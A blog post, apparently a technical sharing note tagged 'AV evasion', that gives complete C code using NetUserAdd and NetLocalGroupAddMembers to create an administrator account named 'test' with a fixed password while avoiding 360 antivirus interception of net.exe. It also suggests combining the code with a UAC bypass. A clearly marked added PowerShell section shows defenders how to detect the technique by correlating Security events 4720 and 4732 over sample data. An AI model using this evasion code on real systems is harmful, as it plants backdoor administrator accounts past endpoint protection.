type
Post
status
Published
date
Mar 1, 2023
slug
bypass-Adduser
summary
tags
Learning
AV evasion
category
Technical sharing
icon
password
💡
Preface: in some environments the administrator account may be disabled or restricted, so another account has to be used to create users. Antivirus products such as 360 also harden the system and intercept the usual command-line route to adding an account, so a user cannot simply be added the normal way.
Below is a method that adds the user by calling the system API (NetUserAdd and NetLocalGroupAddMembers) directly from your own process, which bypasses 360's interception of the command-line path.
👉 (The code below needs administrator privileges; it is offered as an idea, and you can combine it with a UAC bypass.)
```c
#include <windows.h>
#include <lm.h>
#include <stdio.h>
#pragma comment(lib, "netapi32.lib")

int main(void)
{
    LPWSTR servername = NULL;                // NULL = the local machine
    DWORD level = 1;                         // we pass a USER_INFO_1 structure
    DWORD parm_error = 0;                    // index of the bad field if ERROR_INVALID_PARAMETER is returned
    wchar_t username[]  = L"test";           // user name to add
    wchar_t password[]  = L"1q@W3e$r";       // password for the new user (must satisfy local policy)
    wchar_t groupname[] = L"administrators"; // local group to join

    USER_INFO_1 ui1 = { 0 };
    ui1.usri1_name = username;
    ui1.usri1_password = password;
    ui1.usri1_password_age = 0;
    ui1.usri1_priv = USER_PRIV_USER;         // level 1 requires USER_PRIV_USER; the group grants admin
    ui1.usri1_home_dir = NULL;
    ui1.usri1_comment = NULL;
    ui1.usri1_flags = UF_SCRIPT;             // UF_SCRIPT must be set for NetUserAdd
    ui1.usri1_script_path = NULL;

    // Member descriptor used to put the new user into the Administrators group
    LOCALGROUP_MEMBERS_INFO_3 lmi3 = { 0 };
    lmi3.lgrmi3_domainandname = username;

    // Create the account by calling NetUserAdd directly instead of spawning net.exe
    NET_API_STATUS result = NetUserAdd(servername, level, (LPBYTE)&ui1, &parm_error);
    if (result != NERR_Success) {
        printf("[-] Failed to add user: %lu (parm_error=%lu)\n", result, parm_error);
        return 1;
    }
    printf("[+] User added successfully\n");

    // Add the new user to the local Administrators group
    result = NetLocalGroupAddMembers(servername, groupname, 3, (LPBYTE)&lmi3, 1);
    if (result != NERR_Success) {
        printf("[-] Failed to add user to Administrators group: %lu\n", result);
        return 1;
    }
    printf("[+] User added to Administrators group successfully\n");
    return 0;
}
```
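Calling NetUserAdd directly avoids the net.exe/net1.exe path that 360 watches, but the account creation still lands in the Security log: event 4720 ("A user account was created") followed by 4732 ("A member was added to a security-enabled local group"). The PowerShell below is an added example, not code from the original post, showing how a blue team can correlate those two events to flag an account that is created and placed in Administrators within a short window. It assumes an English group name ("Administrators"), joins on the SID because 4732 usually reports the member name as "-", and runs here over constructed sample events in the shape that ConvertFrom-SecurityEvent produces from real Get-WinEvent records.

```powershell
# Added example (not from the original post): detect a new local account that is
# promoted to Administrators shortly after creation, using Security events 4720 + 4732.

function ConvertFrom-SecurityEvent {
    # Flatten a Get-WinEvent record into the few fields we join on.
    param([Parameter(ValueFromPipeline)] [System.Diagnostics.Eventing.Reader.EventRecord] $Event)
    process {
        $x = [xml]$Event.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Id          = $Event.Id
            Time        = $Event.TimeCreated
            TargetUser  = $d['TargetUserName']   # 4720: the new account; 4732: the group name
            TargetSid   = $d['TargetSid']        # 4720: SID of the new account; 4732: SID of the group
            MemberSid   = $d['MemberSid']        # 4732 only: SID of the account that was added
            SubjectUser = $d['SubjectUserName']  # who performed the action
        }
    }
}

function Find-NewAdminAccounts {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowSeconds = 300,
        [string[]] $AdminGroups = @('Administrators')   # assumption: English group name
    )
    $created = $Events | Where-Object Id -eq 4720
    $added   = $Events | Where-Object { $_.Id -eq 4732 -and $AdminGroups -contains $_.TargetUser }
    foreach ($c in $created) {
        foreach ($a in $added) {
            # Join on SID rather than name: 4732 often reports MemberName as "-".
            if ($a.MemberSid -eq $c.TargetSid -and
                $a.Time -ge $c.Time -and
                ($a.Time - $c.Time).TotalSeconds -le $WindowSeconds) {
                [pscustomobject]@{
                    Account   = $c.TargetUser
                    Sid       = $c.TargetSid
                    CreatedBy = $c.SubjectUser
                    Group     = $a.TargetUser
                    Created   = $c.Time
                    AddedAt   = $a.Time
                }
            }
        }
    }
}

# Constructed sample events (same shape as ConvertFrom-SecurityEvent output).
$t = Get-Date '2023-03-01 10:00:00'
$sample = @(
    [pscustomobject]@{ Id=4720; Time=$t;               TargetUser='test';           TargetSid='S-1-5-21-1-2-3-1005'; MemberSid=$null;                  SubjectUser='alice' }
    [pscustomobject]@{ Id=4732; Time=$t.AddSeconds(1); TargetUser='Administrators'; TargetSid='S-1-5-32-544';        MemberSid='S-1-5-21-1-2-3-1005'; SubjectUser='alice' }
    [pscustomobject]@{ Id=4720; Time=$t.AddHours(1);   TargetUser='svc_backup';     TargetSid='S-1-5-21-1-2-3-1006'; MemberSid=$null;                  SubjectUser='bob' }
    [pscustomobject]@{ Id=4732; Time=$t.AddHours(2);   TargetUser='Administrators'; TargetSid='S-1-5-32-544';        MemberSid='S-1-5-21-1-2-3-1006'; SubjectUser='bob' }
)

Find-NewAdminAccounts -Events $sample | Format-Table -AutoSize
# Only 'test' is reported: 'svc_backup' was promoted an hour after creation, outside the window.

# Live use (reading the Security log needs an elevated prompt):
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4720,4732} |
#     ConvertFrom-SecurityEvent | Find-NewAdminAccounts
```

The window is the tunable part: the program above produces 4720 and 4732 within milliseconds of each other, so even a short window catches it, while legitimate provisioning that adds a user and promotes it later tends to fall outside. Auditing of "User Account Management" and "Security Group Management" must be enabled for these events to exist at all.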